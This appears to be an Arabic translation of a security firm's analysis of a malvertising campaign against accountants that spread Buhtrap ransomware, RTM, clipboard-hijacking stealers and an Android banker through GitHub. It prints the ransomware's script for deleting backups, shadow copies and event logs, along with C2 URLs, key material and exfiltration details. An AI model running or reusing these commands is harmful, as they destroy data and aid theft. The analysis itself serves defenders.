لاستهداف المحاسبين في هجوم إلكتروني، يمكنك استخدام مستندات العمل التي يبحثون عنها عبر الإنترنت. وهذا تقريبًا ما كانت تفعله إحدى المجموعات الإلكترونية خلال الأشهر القليلة الماضية، حيث قامت بتوزيع أبواب خلفية معروفة. и بالإضافة إلى برامج التشفير وبرامج سرقة العملات المشفرة. وتقع معظم الأهداف في روسيا. تم تنفيذ الهجوم عن طريق وضع إعلانات ضارة على Yandex.Direct. تم توجيه الضحايا المحتملين إلى موقع ويب حيث طُلب منهم تنزيل ملف ضار متنكر في شكل قالب مستند. قامت Yandex بإزالة الإعلانات الضارة بعد تحذيرنا.
تم تسريب كود مصدر Buhtrap عبر الإنترنت في الماضي حتى يتمكن أي شخص من استخدامه. ليس لدينا معلومات بخصوص توفر رمز RTM.
سنخبرك في هذا المنشور كيف قام المهاجمون بتوزيع البرامج الضارة باستخدام Yandex.Direct واستضافتها على GitHub. سيتم اختتام المنشور بتحليل فني للبرامج الضارة.
عادت Buhtrap وRTM إلى العمل
آلية الانتشار والضحايا
وتشترك الحمولات المختلفة التي يتم تسليمها للضحايا في آلية انتشار مشتركة. تم وضع جميع الملفات الضارة التي أنشأها المهاجمون في مستودعين مختلفين على GitHub.
عادةً ما يحتوي المستودع على ملف ضار واحد قابل للتنزيل، والذي يتغير بشكل متكرر. نظرًا لأن GitHub يتيح لك عرض سجل التغييرات في المستودع، فيمكننا معرفة البرامج الضارة التي تم توزيعها خلال فترة معينة. ولإقناع الضحية بتنزيل الملف الضار، تم استخدام موقع بلانكي-shabloni24[.]ru، الموضح في الشكل أعلاه.
يتبع تصميم الموقع وجميع أسماء الملفات الضارة مفهومًا واحدًا - النماذج والقوالب والعقود والعينات وما إلى ذلك. وبالنظر إلى أن برنامجي Buhtrap وRTM قد تم استخدامهما بالفعل في هجمات على المحاسبين في الماضي، فقد افترضنا أن الإستراتيجية في الحملة الجديدة هي نفسها. والسؤال الوحيد هو كيف وصلت الضحية إلى موقع المهاجمين.
عدوى
تم جذب ما لا يقل عن العديد من الضحايا المحتملين الذين انتهى بهم الأمر إلى هذا الموقع من خلال الإعلانات الضارة. فيما يلي مثال لعنوان URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
وكما ترون من الرابط، تم نشر اللافتة في منتدى المحاسبة الشرعي bb.f2[.]kz. من المهم ملاحظة أن اللافتات ظهرت على مواقع مختلفة، وجميعها تحمل نفس معرف الحملة (blanki_rsya)، ومعظمها يتعلق بخدمات المحاسبة أو المساعدة القانونية. يوضح عنوان URL أن الضحية المحتملة استخدمت طلب "تنزيل نموذج الفاتورة"، والذي يدعم فرضيتنا بشأن الهجمات المستهدفة. فيما يلي المواقع التي ظهرت فيها اللافتات واستعلامات البحث المقابلة لها.
- قم بتنزيل نموذج الفاتورة – bb.f2[.]kz
- نموذج العقد - Ipopen[.]ru
- نموذج شكوى التطبيق - 77metrov[.]ru
- نموذج الاتفاقية - فارغ-dogovor-kupli-prodazhi[.]ru
- عينة من التماس المحكمة - zen.yandex[.]ru
- شكوى عينة - yurday[.]ru
- نماذج العقود النموذجية – Regforum[.]ru
- نموذج العقد – Assistentus[.]ru
- نموذج اتفاقية شقة – napravah[.]com
- نماذج من العقود القانونية - Avito[.]ru
ربما تم تكوين موقع بلانكي-shabloni24[.]ru لاجتياز تقييم مرئي بسيط. عادةً، لا يبدو الإعلان الذي يشير إلى موقع ذو مظهر احترافي مع رابط إلى GitHub أمرًا سيئًا بشكل واضح. بالإضافة إلى ذلك، قام المهاجمون بتحميل ملفات ضارة إلى المستودع لفترة محدودة فقط، على الأرجح أثناء الحملة. في معظم الأحيان، يحتوي مستودع GitHub على أرشيف مضغوط فارغ أو ملف EXE فارغ. وبالتالي، يمكن للمهاجمين توزيع الإعلانات من خلال Yandex.Direct على المواقع التي من المرجح أن يزورها المحاسبون الذين جاءوا استجابة لاستعلامات بحث محددة.
بعد ذلك، دعونا نلقي نظرة على الحمولات المختلفة الموزعة بهذه الطريقة.
تحليل الحمولة
التسلسل الزمني للتوزيع
بدأت الحملة الخبيثة في نهاية أكتوبر 2018 وهي نشطة حتى وقت كتابة هذا التقرير. نظرًا لأن المستودع بأكمله كان متاحًا للعامة على GitHub، فقد قمنا بتجميع جدول زمني دقيق لتوزيع ست عائلات مختلفة من البرامج الضارة (انظر الشكل أدناه). لقد أضفنا سطرًا يوضح وقت اكتشاف رابط الشعار، كما تم قياسه بواسطة قياس ESET عن بعد، للمقارنة مع سجل git. كما ترون، يرتبط هذا جيدًا بتوفر الحمولة على GitHub. يمكن تفسير التناقض في نهاية فبراير بحقيقة أنه لم يكن لدينا جزء من سجل التغيير لأنه تمت إزالة المستودع من GitHub قبل أن نتمكن من الحصول عليه بالكامل.
الشكل 1. التسلسل الزمني لتوزيع البرامج الضارة.
شهادات توقيع الكود
استخدمت الحملة شهادات متعددة. تم توقيع بعضها من قبل أكثر من عائلة برامج ضارة، مما يشير أيضًا إلى أن عينات مختلفة تنتمي إلى نفس الحملة. على الرغم من توفر المفتاح الخاص، لم يوقع المشغلون على الثنائيات بشكل منهجي ولم يستخدموا المفتاح لجميع العينات. في أواخر فبراير 2019، بدأ المهاجمون في إنشاء توقيعات غير صالحة باستخدام شهادة مملوكة لشركة Google والتي لم يكن لديهم المفتاح الخاص لها.
جميع الشهادات المشاركة في الحملة وعائلات البرامج الضارة التي تحملها مدرجة في الجدول أدناه.
لقد استخدمنا أيضًا شهادات توقيع التعليمات البرمجية هذه لإنشاء روابط مع عائلات البرامج الضارة الأخرى. بالنسبة لمعظم الشهادات، لم نعثر على عينات لم يتم توزيعها من خلال مستودع GitHub. ومع ذلك، تم استخدام شهادة TOV “MARIYA” لتوقيع البرامج الضارة التابعة لشبكة الروبوتات وادواري وعمال المناجم. ومن غير المرجح أن تكون هذه البرامج الضارة مرتبطة بهذه الحملة. على الأرجح، تم شراء الشهادة على Darknet.
Win32/Filecoder.Buhtrap
كان العنصر الأول الذي لفت انتباهنا هو Win32/Filecoder.Buhtrap المكتشف حديثًا. هذا هو ملف دلفي الثنائي الذي يتم تعبئته في بعض الأحيان. تم توزيعه بشكل رئيسي في فبراير-مارس 2019. إنه يتصرف كما يليق ببرنامج الفدية - فهو يبحث في محركات الأقراص المحلية ومجلدات الشبكة ويقوم بتشفير الملفات المكتشفة. لا يحتاج إلى اتصال بالإنترنت ليتم اختراقه لأنه لا يتصل بالخادم لإرسال مفاتيح التشفير. وبدلاً من ذلك، يضيف "رمزًا مميزًا" إلى نهاية رسالة الفدية، ويقترح استخدام البريد الإلكتروني أو Bitmessage للاتصال بالمشغلين.
لتشفير أكبر عدد ممكن من الموارد الحساسة، يقوم Filecoder.Buhtrap بتشغيل مؤشر ترابط مصمم لإيقاف تشغيل البرامج الرئيسية التي قد تحتوي على معالجات ملفات مفتوحة تحتوي على معلومات قيمة يمكن أن تتداخل مع التشفير. العمليات المستهدفة هي بشكل أساسي أنظمة إدارة قواعد البيانات (DBMS). بالإضافة إلى ذلك، يقوم Filecoder.Buhtrap بحذف ملفات السجل والنسخ الاحتياطية لجعل استعادة البيانات أمرًا صعبًا. للقيام بذلك، قم بتشغيل البرنامج النصي الدفعي أدناه.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
يستخدم Filecoder.Buhtrap خدمة IP Logger شرعية عبر الإنترنت مصممة لجمع معلومات حول زوار موقع الويب. يهدف هذا إلى تتبع ضحايا برامج الفدية، وهي مسؤولية سطر الأوامر:
mshta.exe "javascript:document.write('');"
يتم تحديد الملفات للتشفير إذا لم تتطابق مع ثلاث قوائم استبعاد. أولاً، لا يتم تشفير الملفات ذات الامتدادات التالية: .com، .cmd، .cpl، .dll، .exe، .hta، .lnk، .msc، .msi، .msp، .pif، .scr، .sys و .مضرب. ثانيًا، يتم استبعاد جميع الملفات التي يحتوي المسار الكامل لها على سلاسل دليل من القائمة أدناه.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
ثالثًا، يتم أيضًا استبعاد أسماء ملفات معينة من التشفير، ومن بينها اسم ملف رسالة الفدية. القائمة معروضة أدناه. من الواضح أن كل هذه الاستثناءات تهدف إلى الحفاظ على تشغيل الآلة، ولكن مع الحد الأدنى من صلاحيتها للسير على الطريق.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
نظام تشفير الملفات
بمجرد تنفيذ البرنامج الضار، يقوم بإنشاء زوج مفاتيح RSA بطول 512 بت. يتم بعد ذلك تشفير الأس الخاص (d) والمعامل (n) باستخدام مفتاح عام مشفر بقوة 2048 بت (الأس العام والمعامل)، ومعبأ بـ zlib، ومشفر بbase64. يظهر الكود المسؤول عن ذلك في الشكل 2.
الشكل 2. نتيجة تفكيك الأشعة السداسية لعملية إنشاء زوج مفاتيح RSA 512 بت.
فيما يلي مثال لنص عادي يحتوي على مفتاح خاص تم إنشاؤه، وهو رمز مميز مرفق برسالة الفدية.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
المفتاح العام للمهاجمين موضح أدناه.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
يتم تشفير الملفات باستخدام AES-128-CBC بمفتاح 256 بت. لكل ملف مشفر، يتم إنشاء مفتاح جديد ومتجه تهيئة جديد. تتم إضافة المعلومات الأساسية إلى نهاية الملف المشفر. دعونا نفكر في تنسيق الملف المشفر.
تحتوي الملفات المشفرة على العنوان التالي:
يتم تشفير بيانات الملف المصدر مع إضافة قيمة VEGA السحرية إلى أول 0x5000 بايت. يتم إرفاق جميع معلومات فك التشفير بملف بالبنية التالية:
- تحتوي علامة حجم الملف على علامة تشير إلى ما إذا كان حجم الملف أكبر من 0x5000 بايت
- مفتاح AES = ZlibCompress(RSAEncrypt(مفتاح AES + IV، المفتاح العام لزوج مفاتيح RSA الذي تم إنشاؤه))
- مفتاح RSA blob = ZlibCompress(RSAEncrypt (مفتاح RSA الخاص الذي تم إنشاؤه، مفتاح RSA العام المشفر))
Win32/كليببانكر
Win32/ClipBanker هو مكون تم توزيعه بشكل متقطع من أواخر أكتوبر إلى أوائل ديسمبر 2018. ويتمثل دورها في مراقبة محتويات الحافظة، والبحث عن عناوين محافظ العملات المشفرة. بعد تحديد عنوان المحفظة المستهدفة، يستبدله ClipBanker بعنوان يُعتقد أنه يخص المشغلين. العينات التي فحصناها لم تكن معلبة أو غامضة. الآلية الوحيدة المستخدمة لإخفاء السلوك هي تشفير السلسلة. يتم تشفير عناوين محفظة المشغل باستخدام RC4. العملات المشفرة المستهدفة هي Bitcoin وBitcoin Cash وDogecoin وEthereum وRipple.
خلال الفترة التي كانت فيها البرامج الضارة تنتشر في محافظ Bitcoin الخاصة بالمهاجمين، تم إرسال مبلغ صغير إلى VTS، مما يلقي بظلال من الشك على نجاح الحملة. بالإضافة إلى ذلك، لا يوجد أي دليل يشير إلى أن هذه المعاملات كانت مرتبطة بـ ClipBanker على الإطلاق.
Win32/RTM
تم توزيع مكون Win32/RTM لعدة أيام في أوائل مارس 2019. RTM هو مصرفي طروادة مكتوب بلغة دلفي، ويستهدف الأنظمة المصرفية عن بعد. في عام 2017، نشر باحثو شركة ESET لهذا البرنامج، الوصف لا يزال ذا صلة. في يناير 2019، تم إصدار بالو ألتو نتوركس أيضًا .
محمل بوهتراب
لبعض الوقت، كان برنامج التنزيل متاحًا على GitHub ولم يكن مشابهًا لأدوات Buhtrap السابقة. يلجأ إلى https://94.100.18[.]67/RSS.php?<some_id> للوصول إلى المرحلة التالية وتحميلها مباشرة في الذاكرة. يمكننا التمييز بين سلوكين من كود المرحلة الثانية. في عنوان URL الأول، اجتاز RSS.php الباب الخلفي لـ Buhtrap مباشرة - وهذا الباب الخلفي مشابه جدًا للباب الخلفي المتاح بعد تسرب كود المصدر.
ومن المثير للاهتمام أننا نرى العديد من الحملات ذات الباب الخلفي لـ Buhtrap، ويُزعم أن مشغلين مختلفين يديرونها. في هذه الحالة يكون الاختلاف الرئيسي هو أن الباب الخلفي يتم تحميله مباشرة في الذاكرة ولا يستخدم المخطط المعتاد مع عملية نشر DLL التي تحدثنا عنها . بالإضافة إلى ذلك، قام المشغلون بتغيير مفتاح RC4 المستخدم لتشفير حركة مرور الشبكة إلى خادم القيادة والتحكم. في معظم الحملات التي شاهدناها، لم يكلف المشغلون أنفسهم عناء تغيير هذا المفتاح.
أما السلوك الثاني الأكثر تعقيدًا فهو تمرير عنوان URL الخاص بـ RSS.php إلى أداة تحميل أخرى. لقد نفذت بعض التشويش، مثل إعادة بناء جدول الاستيراد الديناميكي. الغرض من أداة تحميل التشغيل هو الاتصال بخادم C&C [.]com/api/F27F84EDA4D13B15/2، أرسل السجلات وانتظر الرد. يقوم بمعالجة الاستجابة كنقطة، وتحميلها في الذاكرة وتنفيذها. الحمولة التي رأيناها أثناء تنفيذ هذا المُحمل كانت هي نفس الباب الخلفي لـ Buhtrap، ولكن قد تكون هناك مكونات أخرى.
أندرويد/جاسوس.بانكر
ومن المثير للاهتمام أنه تم العثور أيضًا على مكون لنظام Android في مستودع GitHub. لقد تواجد في الفرع الرئيسي لمدة يوم واحد فقط - 1 نوفمبر 2018. وبصرف النظر عن نشرها على GitHub، لم يجد قياس ESET عن بعد أي دليل على توزيع هذه البرامج الضارة.
تمت استضافة المكون كحزمة تطبيقات Android (APK). إنها غامضة بشدة. يتم إخفاء السلوك الضار في ملف JAR المشفر الموجود في ملف APK. يتم تشفيره باستخدام RC4 باستخدام هذا المفتاح:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
يتم استخدام نفس المفتاح والخوارزمية لتشفير السلاسل. يقع JAR في APK_ROOT + image/files. تحتوي أول 4 بايتات من الملف على طول ملف JAR المشفر، والذي يبدأ مباشرة بعد حقل الطول.
وبعد فك تشفير الملف، اكتشفنا أنه كان أنوبيس - سابقًا مصرفي لالروبوت. تحتوي البرمجيات الخبيثة على الميزات التالية:
- تسجيل الميكروفون
- أخذ لقطات الشاشة
- الحصول على إحداثيات GPS
- كلوغر
- تشفير بيانات الجهاز وطلب الفدية
- البريد العشوائي
ومن المثير للاهتمام أن المصرفي استخدم تويتر كقناة اتصال احتياطية للحصول على خادم C&C آخر. استخدمت العينة التي قمنا بتحليلها حساب @JonesTrader، ولكن في وقت التحليل كان محظورًا بالفعل.
يحتوي المصرف على قائمة بالتطبيقات المستهدفة على جهاز Android. وهي أطول من القائمة التي تم الحصول عليها في دراسة سوفوس. وتضم القائمة العديد من التطبيقات المصرفية، وبرامج التسوق عبر الإنترنت مثل Amazon وeBay، وخدمات العملات المشفرة.
MSIL/ClipBanker.IH
وكان آخر مكون تم توزيعه كجزء من هذه الحملة هو .NET Windows القابل للتنفيذ، والذي ظهر في مارس 2019. تم تجميع معظم الإصدارات التي تمت دراستها باستخدام ConfuserEx v1.0.0. مثل ClipBanker، يستخدم هذا المكون الحافظة. هدفه هو مجموعة واسعة من العملات المشفرة، بالإضافة إلى العروض على Steam. بالإضافة إلى ذلك، فهو يستخدم خدمة IP Logger لسرقة مفتاح WIF الخاص بالبيتكوين.
آليات الحماية
بالإضافة إلى الفوائد التي يوفرها ConfuserEx في منع التصحيح والتفريغ والتلاعب، يتضمن المكون القدرة على اكتشاف منتجات مكافحة الفيروسات والأجهزة الافتراضية.
للتحقق من أنه يعمل في جهاز ظاهري، تستخدم البرامج الضارة سطر أوامر Windows WMI المدمج (WMIC) لطلب معلومات BIOS، وهي:
wmic bios
ثم يقوم البرنامج بتوزيع إخراج الأمر والبحث عن الكلمات الرئيسية: VBOX، VirtualBox، XEN، qemu، bochs، VM.
للكشف عن منتجات مكافحة الفيروسات، ترسل البرامج الضارة طلب Windows Management Instrumentation (WMI) إلى Windows Security Center باستخدام ManagementObjectSearcher API كما هو موضح أدناه. بعد فك التشفير من base64، تبدو المكالمة كما يلي:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
الشكل 3. عملية تحديد منتجات مكافحة الفيروسات.
بالإضافة إلى ذلك، تتحقق البرامج الضارة مما إذا كان ، أداة للحماية من هجمات الحافظة، وفي حالة تشغيلها، فإنها تعلق جميع سلاسل الرسائل في تلك العملية، وبالتالي تعطيل الحماية.
إصرار
نسخة البرامج الضارة التي درسناها تنسخ نفسها %APPDATA%googleupdater.exe ويعين السمة "المخفية" لدليل جوجل. ثم تقوم بتغيير القيمة SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell في سجل ويندوز ويضيف المسار updater.exe. وبهذه الطريقة، سيتم تنفيذ البرامج الضارة في كل مرة يقوم فيها المستخدم بتسجيل الدخول.
سلوك ضار
وكما هو الحال مع ClipBanker، تراقب البرمجيات الخبيثة محتويات الحافظة وتبحث عن عناوين محفظة العملات المشفرة، وعند العثور عليها، تستبدلها بأحد عناوين المشغل. فيما يلي قائمة بالعناوين المستهدفة بناءً على ما هو موجود في الكود.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
يوجد لكل نوع من العناوين تعبير عادي مطابق. يتم استخدام قيمة STEAM_URL لمهاجمة نظام Steam، كما يمكن رؤيته من التعبير العادي المستخدم للتعريف في المخزن المؤقت:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
قناة الترشيح
بالإضافة إلى استبدال العناوين في المخزن المؤقت، تستهدف البرامج الضارة مفاتيح WIF الخاصة لمحافظ Bitcoin وBitcoin Core وElectrum Bitcoin. يستخدم البرنامج موقع plogger.org كقناة استخراج للحصول على مفتاح WIF الخاص. للقيام بذلك، يضيف المشغلون بيانات المفتاح الخاص إلى رأس User-Agent HTTP، كما هو موضح أدناه.
الشكل 4. وحدة تحكم IP Logger مع بيانات الإخراج.
لم يستخدم المشغلون iplogger.org لتصفية المحافظ. من المحتمل أنهم لجأوا إلى طريقة مختلفة نظرًا لعدد الأحرف المسموح به في الحقل وهو 255 حرفًا User-Agentالمعروضة في واجهة الويب IP Logger. في العينات التي درسناها، تم تخزين خادم الإخراج الآخر في متغير البيئة DiscordWebHook. والمثير للدهشة أنه لم يتم تعيين متغير البيئة هذا في أي مكان في الكود. يشير هذا إلى أن البرنامج الضار لا يزال قيد التطوير وأن المتغير مخصص لجهاز اختبار المشغل.
هناك علامة أخرى على أن البرنامج قيد التطوير. يتضمن الملف الثنائي عنواني URL لـ iplogger.org، ويتم الاستعلام عنهما عند تصفية البيانات. في طلب إلى أحد عناوين URL هذه، تكون القيمة الموجودة في الحقل المُحيل مسبوقة بـ "DEV /". لقد عثرنا أيضًا على إصدار لم يتم تجميعه باستخدام ConfuserEx، ويُسمى مستلم عنوان URL هذا DevFeedbackUrl. استنادًا إلى اسم متغير البيئة، نعتقد أن المشغلين يخططون لاستخدام الخدمة الشرعية Discord ونظام اعتراض الويب الخاص بها لسرقة محافظ العملات المشفرة.
اختتام
تعد هذه الحملة مثالاً على استخدام الخدمات الإعلانية المشروعة في الهجمات السيبرانية. ويستهدف المخطط المنظمات الروسية، لكننا لن نتفاجأ برؤية مثل هذا الهجوم باستخدام خدمات غير روسية. لتجنب التسوية، يجب أن يكون المستخدمون واثقين من سمعة مصدر البرنامج الذي يقومون بتنزيله.
تتوفر قائمة كاملة بمؤشرات التسوية وسمات MITRE ATT&CK على .
المصدر: www.habr.com